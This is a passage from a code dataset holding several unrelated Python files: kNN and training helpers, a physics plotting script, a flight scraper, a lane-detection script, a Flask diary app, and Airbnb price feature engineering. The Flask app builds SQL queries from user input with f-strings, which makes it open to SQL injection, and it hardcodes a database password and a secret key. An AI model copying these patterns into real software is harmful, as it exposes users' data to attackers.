distAndMark.append([math.sqrt(thisDistSquare), thisTrainData[len(thisTrainData)-1]])\r\n\r\n # sort distAndMark array\r\n distAndMark = sorted(distAndMark, key=lambda x:x[0], reverse=False)\r\n\r\n # count the vote for each class (using weight = len(dfTrain)/trainCount)\r\n vote = {} # vote result for each class: [class targetVals[j], vote score of targetVals[j]]\r\n for j in range(len(classCount)): vote[targetVals[j]] = 0 # initialize dictionary vote\r\n\r\n for j in range(k): # count the vote using k nearest neighbors\r\n thisMark = distAndMark[j][1] # mark of this 'neighbor'\r\n if caseWeight == True: vote[thisMark] = vote[thisMark] + len(dfTrain) / classCount[thisMark]\r\n else: vote[thisMark] = vote[thisMark] + 1\r\n\r\n # use average vote value\r\n if useAverage == True:\r\n sumOfVote = 0.0 # sum of (vote weight)\r\n sumOfKeyVal = 0.0 # sum of (key value)*(vote weight)\r\n \r\n for key in vote.keys():\r\n sumOfVote += float(vote[key])\r\n sumOfKeyVal += float(key) * float(vote[key])\r\n\r\n avgVoteVal = sumOfKeyVal / sumOfVote\r\n\r\n # append the average vote result (=prediction) to result array\r\n result.append(avgVoteVal)\r\n resultT.append([avgVoteVal])\r\n\r\n # find max-voted item\r\n else:\r\n largestVoteVal = -1 # number of votes of largest voted target value\r\n largestVoteTargetVal = -1 # largest voted target value\r\n\r\n # key: class targetVals[j], value: vote score of targetVals[j]\r\n for key in vote.keys():\r\n value = vote[key]\r\n \r\n if value > largestVoteVal:\r\n largestVoteVal = value\r\n largestVoteTargetVal = key\r\n\r\n # append the largest vote result (=prediction) to result array\r\n result.append(largestVoteTargetVal)\r\n resultT.append([largestVoteTargetVal])\r\n\r\n # add vote result value\r\n # https://rfriend.tistory.com/352\r\n dfTest = np.column_stack([dfTest, resultT])\r\n\r\n # display as chart\r\n title = '(kNN) test data prediction'\r\n\r\n # print data as 2d or 3d space\r\n if len(dfTest[0]) == 3: # 2 except for target col\r\n PD_.printDataAsSpace(2, pd.DataFrame(dfTest, columns=['pca0', 'pca1', 'target']), title)\r\n elif len(dfTest[0]) == 4: # 3 except for target col\r\n PD_.printDataAsSpace(3, pd.DataFrame(dfTest, columns=['pca0', 'pca1', 'pca2', 'target']), title)\r\n \r\n # return the result array\r\n return result\r\n","sub_path":"AI_BASE/kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":5728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"281894206","text":"from A2 import data_preprocess, model_tuning\n\n\nclass A2:\n best_model = None\n hist = None\n\n def train(self, data_train, data_val):\n \"\"\"\n :param data_train: Predictors and labels in training set.\n :param data_val: Predictors and labels in validation set.\n :param load_model: Set True to load pre-trained model, otherwise train the model from scratch.\n :return: The accuracy on training set.\n \"\"\"\n model = model_tuning.build_model()\n hist, model = model_tuning.train_model(model, data_train, data_val)\n acc_train = model_tuning.measure_acc_train(model, data_train[0], data_train[2])\n\n self.best_model = model\n self.hist = hist\n return acc_train\n\n def test(self, data_test):\n \"\"\"\n :param data_test: Predictors and labels in test set.\n :return: The accuracy on test set.\n \"\"\"\n acc_test = model_tuning.measure_acc_test(self.best_model, data_test[0], data_test[1])\n return acc_test\n\n\ndef data_preprocessing():\n \"\"\"\n :return: The training set, validation set and test set.\n \"\"\"\n predictors, labels = data_preprocess.load_data()\n data_train, data_val, data_test = data_preprocess.train_val_test_split(predictors, labels, 0.2, 0.2)\n X_train_aug = data_preprocess.load_train_aug()\n data_train[0] = data_train[0].append(X_train_aug, ignore_index=True)\n y_train_aug = data_train[1]\n data_train[1] = data_train[1].append(y_train_aug, ignore_index=True)\n data_train, data_val, data_test = data_preprocess.data_prepare(data_train[0], data_train[1], data_val[0],\n data_val[1], data_test[0], data_test[1])\n return data_train, data_val, data_test\n","sub_path":"A2/a2.py","file_name":"a2.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"270898451","text":"#!/usr/bin/env python\n# =============================================================================\n## @file\n# simple PyROOT script to visualize the histograms from LoKi_Phi example\n# @author Vanya BELYAEV Ivan.Belyaev@nikhef.nl\n# @date 2008-06-07\n# =============================================================================\n\"\"\"\nSimple PyROOT script to visualize the histograms from LoKi_Phi example\n\nConfiguration file for LoKiExample package\n\nThis file is a part of LoKi project - \n\\\"C++ ToolKit for Smart and Friendly Physics Analysis\\\"\n\nThe package has been designed with the kind help from\nGalina PAKHLOVA and Sergey BARSUK. Many bright ideas, \ncontributions and advices from G.Raven, J.van Tilburg, \nA.Golutvin, P.Koppenburg have been used in the design.\n\nBy usage of this code one clearly states the disagreement \nwith the campain of Dr.O.Callot et al.: \n\\\"No Vanya's lines are allowed in LHCb/Gaudi software.\\\"\n\n\"\"\"\n# =============================================================================\n__author__ = \" Vanya BELYAEV Ivan.Belyaev@nikhef.nl \"\n__version__ = \" CVS Tag $Name: not supported by cvs2svn $, version $Revision: 1.1 $ \"\n# =============================================================================\n\n\nimport ROOT\n\nf = ROOT.TFile( 'PhiMC_Histos.root' )\nf.ls()\nf.cd('PhiMC')\nf.ls()\nh1 = f.Get('PhiMC/K+ K- mass')\nh2 = f.Get('PhiMC/K+ K- mass, chi2_vx<49')\nh3 = f.Get('PhiMC/K+ K- mass, MC-truth')\n\ncanvas = ROOT.TCanvas(\"canvas\",'LoKiExample: LoKi_PhiMC', 1000, 1000 )\n\nh1.SetLineColor(3)\nh1.SetLineWidth(3)\nh1.Draw()\nh2.SetLineColor(4)\nh2.SetLineWidth(3)\nh2.Draw('Same')\nh3.SetLineColor(2)\nh3.SetLineWidth(3)\nh3.Draw('Same')\n\ncanvas.Print ( 'LoKi_PhiMC.eps' )\ncanvas.Print ( 'LoKi_PhiMC.gif' )\n\n\n \n# =============================================================================\n# The end \n# =============================================================================\n","sub_path":"Analysis/Ex/LoKiExample/python/LoKiExample/PhiMC_Histos.py","file_name":"PhiMC_Histos.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"295481512","text":"import numpy as np\nimport datetime\nfrom Pricechecker import *\nfrom scrapeparser import Flight\ndef createPriceMaster(Cities,startDate,lengthOfStays):\n # Cities = list of all the cities we have to go through\n master = np.ndarray((len(Cities),len(Cities),sum(lengthOfStays),25), dtype= np.ndarray)\n # our 4d array which stores top 25 flights^^^\n\n startDate = datetime.datetime.strptime(startDate, '%m/%d/%Y')\n # get next d days\n\n dateConverter(startDate)\n\n Dates = []\n for d in range(0,sum(lengthOfStays)):\n Dates.append(startDate+datetime.timedelta(days=d))\n\n # create a loop to go through the combinations\n\n length = len(Cities)\n\n for i in range(0,length):\n for j in range(0,length):\n if(Cities[i]!=Cities[j]):\n m = np.ndarray((sum(lengthOfStays),25),dtype= Flight)\n print(Cities[i], Cities[j])\n for d in range(len(Dates)):\n #for each date create a matrix\n convertedDate = dateConverter(Dates[d])\n currentFlights = getFlights(Cities[i],Cities[j],convertedDate)\n currentFlights = currentFlights[:25]\n if(len(currentFlights) != 25):\n currentFlights.extend([None] * (25-len(currentFlights)))\n for x in range(0,25):\n m[d][x] = currentFlights[x]\n m[d][0].print()\n master[i][j] = m\n #Add a sort by price somewhere in the lower tier classes\n return master\n\ndef dateConverter(date):\n # input is a datetime object\n Months = [\"Jan\",\"Feb\",\"Mar\",\"Apr\",\"May\",\"Jun\",\"Jul\",\"Aug\",\"Sep\",\"Oct\",\"Nov\",\"Dec\"]\n Days = np.arange(1,31)\n convertedDate = Months[date.month+1] + \" \" + str(date.day) + \", \" +str(date.year)\n return convertedDate","sub_path":"Scrapper.py","file_name":"Scrapper.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"252082505","text":"import numpy as np\nimport cv2\nimport numpy.polynomial.polynomial as npp\n\n\"\"\"\nVariable setup-\n1 - Canny thresholds\n2 - Mask polygon co-ords\n3 - Hough transformation vars\n\"\"\"\n# 1 - Lower/Upper Canny thresholds\n# Depreciated - Variables have to manually be set in the canny function otherwise the code breaks.\n\n#2 - Points 1-4 co-ordinates for mask\nx1 = 422\ny1 = 332\nx2 = 123\ny2 = 540\nx3 = 897\ny3 = 540\nx4 = 551\ny4 = 323\n\n#3 - Hough transformation variables\nrho = 2\ntheta = 1 * np.pi/180\nthreshold = 23\nminLength = 3\nmaxGap = 21\n\n\"\"\"\nVideo import/export setup\n\"\"\"\n# Importing the test video\ncap = cv2.VideoCapture(\"test_videos/solidYellowLeft.mp4\")\nif not cap.isOpened():\n raise BrokenPipeError(\"Video not initializing\")\n\n# Defining codecs and videoWriter for creating output video\nfourcc = cv2.VideoWriter_fourcc(*\"DIVX\")\noutput = cv2.VideoWriter(\"annotated_videos/solidYellowLeft_final.avi\", fourcc, 20.0, (int(cap.get(3)), int(cap.get(4))))\n\n\"\"\"\nVideo processing start\n\"\"\"\nwhile True:\n ret, frame = cap.read()\n\n if not ret: # If frame is not read, video has ended, exit\n break\n\n # Image converted to grayscale for processing\n img = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Canny edge detection run on image\n canny = cv2.Canny(img, 174, 173)\n\n # Creating polygon mask\n mask = np.zeros_like(canny)\n imshape = img.shape\n vertices = np.array([[(x1, y1), (x2, y2), (x3, y3), (x4, y4)]], dtype=np.int32)\n cv2.fillPoly(mask, vertices, 255)\n\n # Applying mask and hough transform\n masked_edges = cv2.bitwise_and(canny, mask)\n linesP = cv2.HoughLinesP(masked_edges, rho, theta, threshold, np.array([]), minLength, maxGap)\n\n # Drawing lane lines based upon average of hough lines\n left_points_x = []\n left_points_y = []\n right_points_x = []\n right_points_y = []\n if linesP is not None: # Determining whether a line is horizontal (discarded) or to the left or right of the image\n for i in range(0, len(linesP)):\n l = linesP[i][0]\n # l0 = x1, l1 = y1, l2 = x2, l3 = y2\n # cv2.line(frame, (l[0], l[1]), (l[2], l[3]), (0, 255, 100), 2, cv2.LINE_AA)\n if (l[3]-l[1]) / (l[2]-l[0]) > 0.25 or (l[3]-l[1]) / (l[2]-l[0]) < -0.25:\n if l[0] <= (int(cap.get(3)) //2 ):\n left_points_x.append(l[0])\n left_points_y.append(l[1])\n left_points_x.append(l[2])\n left_points_y.append(l[3])\n else:\n right_points_x.append(l[0])\n right_points_y.append(l[1])\n right_points_x.append(l[2])\n right_points_y.append(l[3])\n\n # Using linear regression to find linear equations representing left and right lines\n left_line = None\n right_line = None\n if left_points_x and left_points_y:\n left_line = npp.polyfit(left_points_y, left_points_x, 1)\n if right_points_x and right_points_y:\n right_line = npp.polyfit(right_points_y, right_points_x, 1)\n\n # Drawing the left and right lines using co-ords determined from line equations\n if left_line is not None:\n cv2.line(frame, (int(npp.polyval(y1, left_line)), y1),\n (int(npp.polyval(y2, left_line)), y2), (0, 255, 100), 4, cv2.LINE_AA)\n if right_line is not None:\n cv2.line(frame, (int(npp.polyval(y3, right_line)), y3),\n (int(npp.polyval(y4, right_line)), y4), (0, 255, 100), 4, cv2.LINE_AA)\n\n # Writing the modified frame to the output video\n output.write(frame)\n\n cv2.imshow(\"frame\", frame)\n if cv2.waitKey(19) == ord('q'):\n break\n\ncap.release()\noutput.release()\ncv2.destroyAllWindows()\n","sub_path":"A3_Line_Detection/videoAnnotator_final.py","file_name":"videoAnnotator_final.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"617425300","text":"import os, requests\nimport pymysql\nfrom datetime import datetime\nfrom flask import Flask, render_template\nfrom flask import request, redirect, abort, session, jsonify\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport random\n\n\n\napp = Flask(__name__, \n static_folder=\"static\",\n template_folder=\"views\")\napp.config['ENV'] = 'development'\napp.config['DEBUG'] = True\napp.secret_key = 'abcabc'\n\ndb = pymysql.connect(\n user='root',\n passwd='8427728c',\n host='localhost',\n db='0424_project',\n charset='utf8',\n cursorclass=pymysql.cursors.DictCursor\n)\n\ndef get_menu(name):\n cursor = db.cursor()\n cursor.execute(f\"\"\"select b.* from tb_members a, tb_diary b where a.id = b.member_id and a.name = '{name}'\"\"\")\n menu = [f\"
  • {row['title']}
  • \"\n for row in cursor.fetchall()]\n return '\\n'.join(menu)\n\n \n@app.route(\"/\", methods = [\"GET\", \"POST\"])\ndef index(): \n \n title = 'Welcome ' + session['user']['name'] if 'user' in session else 'Welcome'\n content = 'Welcome My Diary!'\n \n if 'user' in session:\n name = session['user']['name']\n menu = get_menu(session['user']['name'])\n else:\n name = ''\n menu = ''\n \n return render_template('template.html',\n name = name,\n title = title,\n content = content,\n menu = menu)\n\n@app.route(\"/login\", methods = [\"GET\", \"POST\"])\ndef login():\n message = \"\"\n if request.method == \"POST\":\n cursor = db.cursor()\n cursor.execute(f\"\"\"select * from tb_members where name = '{request.form[\"name\"]}'\"\"\")\n user = cursor.fetchone()\n \n if user is None:\n message = \"

    회원이 아닙니다.

    \"\n else:\n cursor.execute(f\"\"\"\n select id, name, profile, password from tb_members \n where name = '{request.form['name']}' and \n password = SHA2('{request.form['password']}', 256)\"\"\")\n user = cursor.fetchone()\n if user is None:\n message = \"

    비밀번호를 확인해주세요

    \"\n else:\n session['user'] = user\n return redirect(\"/\")\n \n return render_template('login.html',\n message=message)\n\n@app.route('/logout')\ndef logout():\n session.pop('user', None)\n return redirect('/')\n\n\n\n@app.route('/')\ndef diary(id):\n cursor = db.cursor()\n cursor.execute(f\"\"\"select title, content from tb_diary\n where id = {id}\n \"\"\")\n diary_list = cursor.fetchone()\n title = diary_list['title']\n content = diary_list['content'] \n \n return render_template('diary.html',\n name = session['user']['name'],\n title=title,\n content=content,\n menu=get_menu(session['user']['name']),\n id = id,\n img_src = get_img(title))\n\n# 웹에서 이미지 검색 & 결과 보여주기\ndef get_img(word):\n url = \"https://search.naver.com/search.naver\"\n query = { 'where': 'image',\n 'sm' : 'tab_jum',\n 'query' : word\n }\n response = requests.get(url,params=query)\n soup = BeautifulSoup(response.content, \"html.parser\")\n tags = soup.select('img._img')\n \n \n \n return tags[random.randrange(50)]['data-source']\n\n\n@app.route('/create', methods=[\"get\", \"post\"])\ndef create():\n if request.method == \"POST\":\n cursor = db.cursor()\n cursor.execute(f\"\"\"insert tb_diary (title, content, created, member_id)\n values ('{request.form['title']}', '{request.form['content']}',\n '{datetime.now()}', '{session['user']['id']}')\n \"\"\")\n db.commit()\n\n return redirect('/')\n \n return render_template('create.html',\n name = session['user']['name'],\n menu = get_menu(session['user']['name']))\n\n@app.route(\"/delete/\")\ndef delete(id):\n cursor = db.cursor()\n cursor.execute(f\"delete from tb_diary where id='{id}'\")\n db.commit()\n \n return redirect(\"/\")\n \n@app.route(\"/update/\", methods = [\"GET\", \"POST\"])\ndef update(id):\n cursor = db.cursor()\n cursor.execute(f\"\"\"select title, content from tb_diary\n where id = {id}\n \"\"\")\n diary_list = cursor.fetchone()\n title = diary_list['title']\n content = diary_list['content']\n \n if request.method == \"POST\":\n cursor.execute(f\"\"\"update tb_diary set\n title = '{request.form['title']}',\n content = '{request.form['content']}',\n created = '{datetime.now()}'\n where id = '{id}'\"\"\")\n return redirect(\"/\")\n \n return render_template('update.html',\n name = session['user']['name'],\n title=title,\n content=content,\n menu=get_menu(session['user']['name']),\n id = id)\n\n\n@app.route('/crawler/google/')\ndef crawler_google(word):\n# def download_img_from_tag(tag, filename):\n# response = requests.get(tag['data-source'])\n# with open(filename, 'wb') as f:\n# f.write(response.content)\n\n driver = webdriver.Chrome('chromedriver.exe')\n driver.implicitly_wait(10)\n \n url = \"https://search.naver.com/search.naver?sm=top_hty&fbm=1&ie=utf8&query=%EB%84%A4%EC%9D%B4%EB%B2%84%EC%9A%B4%EC%84%B8\"\n driver.get(url)\n driver.find_element_by_xpath('//*[@id=\"srch_txt\"]').click()\n driver.find_element_by_css_selector('#srch_txt').send_keys(word)\n driver.find_element_by_xpath('//*[@id=\"fortune_birthCondition\"]/div[1]/fieldset/input').click()\n# soup = BeautifulSoup(driver.page_source, 'html.parser')\n# tags = soup.select(\"h3.r dO0Ag\")\n# filenames = []\n# for i, tag in enumerate(tags):\n# # tag를 던지면 이미지를 저장하고 이미지명을 반환\n# filename = f'static/{word}{i}.jpg'\n# download_img_from_tag(tag, filename)\n# filenames.append(filename)\n \n# return render_template('crawler.html',\n# files=filenames)\n\n#################################\n#네이버운세 selenium\n#####################3\n# from selenium import webdriver\n# import time\n# driver = webdriver.Chrome('chromedriver.exe')\n# driver.implicitly_wait(3)\n# url = \"https://search.naver.com/search.naver?sm=top_hty&fbm=1&ie=utf8&query=%EB%84%A4%EC%9D%B4%EB%B2%84%EC%9A%B4%EC%84%B8\"\n# driver.get(url)\n\n# driver.find_element_by_xpath('//*[@id=\"srch_txt\"]').click()\n# driver.find_element_by_css_selector('#nx_query').click()\n# time.sleep(1)\n# driver.find_element_by_xpath('//*[@id=\"srch_txt\"]').click()\n# driver.find_element_by_css_selector('#srch_txt').send_keys('19801111')\n\n\napp.run(port=8088)","sub_path":"0424_project/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"416010782","text":"import numpy as np \nimport pandas as pd \nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import LabelEncoder\nimport re \nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.model_selection import train_test_split\nimport xgboost as xgb\nfrom sklearn.cluster import MiniBatchKMeans\nimport nltk \nfrom nltk.corpus import stopwords\nimport os \nfrom sklearn.decomposition import PCA\n\nstops = set(stopwords.words(\"english\"))\ntokenizer = nltk.data.load('tokenizers/punkt/english.pickle')\n\ndef load_w2v_model(dir = './' , we_fn = 'glove.840B.300d.txt'):\n print(' >> Indexing word vectors ...')\n embeddings_index = {}\n f = open(os.path.join(dir, we_fn))\n for line in f:\n values = line.split(' ')\n word = values[0] #print(\"values:\",values)\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\n f.close()\n print(' >> Found %s word vectors. [1]' % len(embeddings_index))\n return embeddings_index\n\ndef count_desc_len(x):\n return len(review_to_sentences(x, tokenizer=tokenizer, stops=stops, remove_stopwords=True))\n\ndef string_to_wordlist( review, stops, remove_stopwords ):\n # Function to convert a document to a sequence of words,\n # optionally removing stop words. Returns a list of words.\n #\n # 1. Remove HTML\n #review_text = BeautifulSoup(review,'html.parser').get_text()\n #\n # 2. Remove non-letters\n review_text = re.sub(\"[^a-zA-Z]\",\" \", review)\n #\n # 3. Convert words to lower case and split them\n words = review_text.lower().split()\n #\n # 4. Optionally remove stop words (false by default)\n if remove_stopwords:\n #stops = set(stopwords.words(\"english\"))\n words = [w for w in words if not w in stops]\n #\n # 5. Return a list of words\n return(words)\n\n\n# Define a function to split a review into parsed sentences\ndef review_to_sentences( review, tokenizer, stops , remove_stopwords ):\n # Function to split a review into parsed sentences. Returns a\n # list of sentences, where each sentence is a list of words\n #\n # 1. Use the NLTK tokenizer to split the paragraph into sentences\n raw_sentences = tokenizer.tokenize(review.strip())\n #\n # 2. Loop over each sentence\n sentences = []\n for raw_sentence in raw_sentences:\n # If a sentence is empty, skip it\n if len(raw_sentence) > 0:\n # Otherwise, call review_to_wordlist to get a list of words\n sentences.extend( string_to_wordlist( raw_sentence, stops = stops , remove_stopwords=remove_stopwords ))\n #\n # Return the list of sentences (each sentence is a list of words,\n # so this returns a list of lists\n return sentences\n\n\ndef process_am(x):\n aa = ''\n if type(x) == pd.core.series.Series:\n x = x.values\n aa = [aa + x[i] for i in range(len(x))]\n aa = aa[0]\n aa = re.sub('\"',\" \", aa)\n elif type(x) == str:\n aa = x\n aa = re.sub('\"',\" \", aa)\n aal = []\n _aal = aa.split(',')\n for aa in _aal:\n aa = re.sub(\"{\",\" \", aa)\n aa = re.sub(\"}\",\" \", aa)\n aa = re.sub(\",\",\" \", aa)\n aa = re.sub(\":\",\" \", aa)\n aa = re.sub('’n',\"\", aa)\n aa = aa.strip()\n aa = re.sub('\\s+',\"_\", aa)\n aa = aa.lower()\n if len(aa)>0: \n aal.append(aa)\n return dict.fromkeys(set(aal), 1)\n\ndef perc2float(x):\n return float(x.strip('%'))/100\n\n\n########################\ntrain = pd.read_csv('train.csv')\ntest = pd.read_csv('test.csv')\n\nprint(\"train:\",train.shape)\nprint(\"test:\",test.shape)\n\n# 1. log_price\nprint(\"1. log_price\")\ny_train = train['log_price']\ntrain = train.drop(['log_price'],axis=1)\nassert train.shape[1] == test.shape[1]\nfor i in range(train.shape[1]):\n assert train.columns[i] == test.columns[i]\n\ntrain_obs = len(train)\nall_data = pd.concat([train,test],axis=0)\n\n# 2. property_type, room_type, bed_type\nprint('--------------> Feature Engineering ... ')\nprint(\"2. property_type, room_type, bed_type\")\nencoder = LabelEncoder()\nencoder.fit(all_data['property_type']) \nall_data['property_type'] = encoder.transform(all_data['property_type'])\n\nall_data['room_type'] = all_data['room_type'].map( {'Entire home/apt':5, 'Private room':3, 'Shared room':1})\n\nall_data.bed_type = all_data.bed_type.fillna('missing')\nencoder = LabelEncoder()\nencoder.fit(all_data['bed_type']) \nall_data['bed_type'] = encoder.transform(all_data['bed_type'])\n\n# 3. amenities \nprint(\"3. amenities\")\nam_list = [process_am( all_data.iloc[i]['amenities']) for i in range(len(all_data))]\nassert len(am_list) == len(all_data)\nv = DictVectorizer(sparse=False)\nX = v.fit_transform(am_list)\namenities_df = pd.DataFrame(data=X,columns=v.feature_names_)\namenities_df.index = all_data.index\nall_data = pd.concat([all_data,amenities_df],axis=1)\nall_data = all_data.drop(['amenities'],axis=1)\ndel amenities_df\n\n#4. accommodates , bathrooms\nall_data.bathrooms = all_data.bathrooms.fillna(0)\n\n#5. cancellation_policy, cleaning_fee\nprint(\"5. cancellation_policy, cleaning_fee\")\nall_data['cancellation_policy'] = all_data['cancellation_policy'].map( {\n 'super_strict_60':20, \n 'super_strict_30':30, \n 'strict':50,\n 'moderate':10,\n 'flexible':5,\n 'long_term':1,\n})\n\nall_data['cleaning_fee'] = all_data['cleaning_fee'].map( {\n True:1, \n False:0\n})\n\n# 6. city\nprint(\"6. city\")\nencoder = LabelEncoder()\nencoder.fit(all_data['city']) \nall_data['city'] = encoder.transform(all_data['city'])\n\n# 7. description TODO\nprint(\"7. description ... TODO\")\nall_data['description'] = all_data['description'].fillna('')\n\nall_data['description_len'] = all_data['description'].apply(count_desc_len)\n\nembeddings_index = load_w2v_model()\n\nfeatureVec = np.zeros((len(all_data),300),dtype=\"float32\")\nwarn_w2v = 0 \nfor i in range(len(all_data)):\n words = review_to_sentences(all_data.iloc[i]['description'], tokenizer=tokenizer, stops=stops, remove_stopwords=True)\n featureVec_i = np.zeros((300),dtype=\"float32\")\n #\n nwords = 0.\n # \n #\n # Loop over each word in the review and, if it is in the model's\n # vocaublary, add its feature vector to the total\n for word in words:\n if word in embeddings_index.keys(): \n nwords = nwords + 1.\n featureVec_i = np.add(featureVec_i,embeddings_index[word])\n # \n # Divide the result by the number of words to get the average\n if nwords > 0: \n featureVec_i = np.divide(featureVec_i,nwords)\n else:\n #print(\">>> WARNING <<< No words in vocaublary\")\n warn_w2v = warn_w2v + 1 \n #print(str(words))\n featureVec[i] = featureVec_i\n\nprint(\" >> No words in vocaublary for \",warn_w2v,\"cases\")\n\n#desc_w2v = pd.DataFrame(data=featureVec , columns=['desc_w2v_'+str(i) for i in range(300)])\n#desc_w2v.index = all_data.index\n#all_data = pd.concat([all_data,desc_w2v],axis=1)\n\npca = PCA().fit(featureVec)\nw2v_desc_pca_transf = pca.transform(featureVec)\nall_data['w2v_desc_pca0'] = w2v_desc_pca_transf[:, 0]\nall_data['w2v_desc_pca1'] = w2v_desc_pca_transf[:, 1]\nall_data['w2v_desc_pca2'] = w2v_desc_pca_transf[:, 2]\nall_data['w2v_desc_pca3'] = w2v_desc_pca_transf[:, 3]\nall_data['w2v_desc_pca4'] = w2v_desc_pca_transf[:, 4]\nall_data['w2v_desc_pca5'] = w2v_desc_pca_transf[:, 5]\nall_data['w2v_desc_pca6'] = w2v_desc_pca_transf[:, 6]\nall_data['w2v_desc_pca7'] = w2v_desc_pca_transf[:, 7]\nall_data['w2v_desc_pca8'] = w2v_desc_pca_transf[:, 8]\nall_data['w2v_desc_pca9'] = w2v_desc_pca_transf[:, 9]\nall_data['w2v_desc_pca10'] = w2v_desc_pca_transf[:, 10]\nall_data['w2v_desc_pca11'] = w2v_desc_pca_transf[:, 11]\nall_data['w2v_desc_pca12'] = w2v_desc_pca_transf[:, 12]\nall_data['w2v_desc_pca13'] = w2v_desc_pca_transf[:, 13]\nall_data['w2v_desc_pca14'] = w2v_desc_pca_transf[:, 14]\nall_data['w2v_desc_pca15'] = w2v_desc_pca_transf[:, 15]\nall_data['w2v_desc_pca16'] = w2v_desc_pca_transf[:, 16]\nall_data['w2v_desc_pca17'] = w2v_desc_pca_transf[:, 17]\nall_data['w2v_desc_pca18'] = w2v_desc_pca_transf[:, 18]\nall_data['w2v_desc_pca19'] = w2v_desc_pca_transf[:, 19]\nall_data['w2v_desc_pca20'] = w2v_desc_pca_transf[:, 20]\nall_data['w2v_desc_pca21'] = w2v_desc_pca_transf[:, 21]\nall_data['w2v_desc_pca22'] = w2v_desc_pca_transf[:, 22]\nall_data['w2v_desc_pca23'] = w2v_desc_pca_transf[:, 23]\nall_data['w2v_desc_pca24'] = w2v_desc_pca_transf[:, 24]\nall_data['w2v_desc_pca25'] = w2v_desc_pca_transf[:, 25]\nall_data['w2v_desc_pca26'] = w2v_desc_pca_transf[:, 26]\nall_data['w2v_desc_pca27'] = w2v_desc_pca_transf[:, 27]\nall_data['w2v_desc_pca28'] = w2v_desc_pca_transf[:, 28]\nall_data['w2v_desc_pca29'] = w2v_desc_pca_transf[:, 29]\n\nkmeans = MiniBatchKMeans(n_clusters=100, batch_size=10000).fit(featureVec) ## TODO: tune the number of cluster \nall_data.loc[:, 'w2v_desc_cluster_100'] = kmeans.predict(featureVec)\n\nkmeans = MiniBatchKMeans(n_clusters=1000, batch_size=10000).fit(featureVec) ## TODO: tune the number of cluster \nall_data.loc[:, 'w2v_desc_cluster_1000'] = kmeans.predict(featureVec)\n\nkmeans = MiniBatchKMeans(n_clusters=3000, batch_size=10000).fit(featureVec) ## TODO: tune the number of cluster \nall_data.loc[:, 'w2v_desc_cluster_3000'] = kmeans.predict(featureVec)\n\nall_data = all_data.drop(['description'],axis=1)\n\n\n# 8. first_review , last_review , number_of_reviews , review_scores_rating\nprint(\"8. first_review , last_review , number_of_reviews , review_scores_rating ... TODO better\")\nmost_recent_review = pd.to_datetime(all_data.last_review).max()\ndelta_last_review = most_recent_review - pd.to_datetime(all_data.last_review)\ndelta_last_review = delta_last_review.fillna(-1)\ndelta_last_review = delta_last_review.map(lambda x: x.total_seconds()/(60*60*24))\nall_data['delta_most_recent_review'] = delta_last_review\n\ndelta_rev = pd.to_datetime(all_data.last_review) - pd.to_datetime(all_data.first_review)\ndelta_rev = delta_rev.fillna(-1)\ndelta_rev = delta_rev.map(lambda x: x.total_seconds()/(60*60*24))\nall_data['delta_rev'] = delta_rev\n\ndelta_rev_density = all_data.number_of_reviews+0.0000000000000001 / delta_rev\ndelta_rev_density = delta_rev_density.fillna(0)\nall_data['delta_rev_density'] = delta_rev_density\n\nall_data = all_data.drop(['first_review','last_review'],axis=1)\nall_data['review_scores_rating'] = all_data['review_scores_rating'].fillna(-1)\n\n# 9. host_has_profile_pic, host_identity_verified, host_since\nprint(\"9. host_has_profile_pic, host_identity_verified, host_since \")\nall_data['host_has_profile_pic'] = all_data['host_has_profile_pic'].fillna('f')\nall_data['host_identity_verified'] = all_data['host_identity_verified'].fillna('f')\nall_data['host_has_profile_pic'] = all_data['host_has_profile_pic'].map({'t':1,'f':0})\nall_data['host_identity_verified'] = all_data['host_identity_verified'].map({'t':1,'f':0})\n\nhost_oldest = pd.to_datetime(all_data.host_since).min()\ndelta_host = pd.to_datetime(all_data.host_since) - host_oldest \ndelta_host = delta_host.fillna(-1)\ndelta_host = delta_host.map(lambda x: x.total_seconds()/(60*60*24))\nall_data['delta_host'] = delta_host\n\nall_data = all_data.drop(['host_since'],axis=1)\n\n# 10. host_response_rate , instant_bookable\nprint(\"10. host_response_rate , instant_bookable \")\nall_data['instant_bookable'] = all_data['instant_bookable'].map({'t':1,'f':0})\nall_data.host_response_rate = all_data.host_response_rate.fillna('0%')\nall_data.host_response_rate = all_data.host_response_rate.apply(perc2float)\n\n\n# 11. latitude,longitude TODO ... leave as-is for now \nprint(\"11. latitude,longitude .......... TODO \")\n# pca = PCA().fit(all_data[['latitude','longitude']])\n# lalo_pca_transf = pca.transform(all_data[['latitude','longitude']])\n# all_data['latitude'] = lalo_pca_transf[:, 0]\n# all_data['longitude'] = lalo_pca_transf[:, 1]\n\n\nkmeans = MiniBatchKMeans(n_clusters=1000, batch_size=10000).fit(all_data[['latitude','longitude']]) ## TODO: tune the number of cluster \nall_data.loc[:, 'geo_cluster_1000'] = kmeans.predict(all_data[['latitude','longitude']])\nkmeans = MiniBatchKMeans(n_clusters=3000, batch_size=10000).fit(all_data[['latitude','longitude']]) ## TODO: tune the number of cluster \nall_data.loc[:, 'geo_cluster_3000'] = kmeans.predict(all_data[['latitude','longitude']])\nkmeans = MiniBatchKMeans(n_clusters=5000, batch_size=10000).fit(all_data[['latitude','longitude']]) ## TODO: tune the number of cluster \nall_data.loc[:, 'geo_cluster_5000'] = kmeans.predict(all_data[['latitude','longitude']])\nkmeans = MiniBatchKMeans(n_clusters=7000, batch_size=10000).fit(all_data[['latitude','longitude']]) ## TODO: tune the 